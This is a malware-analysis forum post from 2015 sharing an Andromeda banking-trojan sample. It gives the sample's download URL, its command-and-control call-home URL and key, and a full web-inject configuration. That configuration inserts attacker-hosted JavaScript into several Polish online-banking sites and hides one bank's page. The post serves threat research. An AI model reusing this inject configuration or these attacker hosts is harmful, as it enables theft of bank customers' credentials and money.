A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
#26872 by sysopfb, Fri Oct 02, 2015 6:43 pm
Sample from Andromeda
https://www.virustotal.com/en/file/d627 ... /analysis/

Downloads (attached)
https://www.virustotal.com/en/file/85cf ... /analysis/

From: jrp.wik.zdzieszowice.pl/modul/pessa.exe

Calls home:
Code:
www.mymotherhascome.com/info.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U
Config:
Code:
[{"url":"online.mbank.pl\/pl*","stringbefore":"<body>","stringafter":"<div","injectionstring":"<script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=1\"><\/script>"},{"url":"*.pekao24.pl*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=4\"><\/script>"},{"url":"*multibank.pl*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script src=\"\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.11.3\/jquery.min.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=5\"><\/script>"},{"url":"online.ingbank.pl\/bskonl\/*","stringbefore":"<\/title>","stringafter":"<","injectionstring":"<script src=\"\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.11.3\/jquery.min.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/www.mymotherhascome.com\/js\/get.php?key=DxoKI4EEMZwJGIw5SUxMCIHBQRKA4U&id=6\"><\/script>"},{"url":"online.ingbank.pl\/bskonl\/*","stringbefore":"<div id=\"main\"","stringafter":">","injectionstring":"style=\"opacity:0;\" "}]
Sample and injects are attached.
Attachments (pw: infected): two archives, 49.51 KiB and 288.08 KiB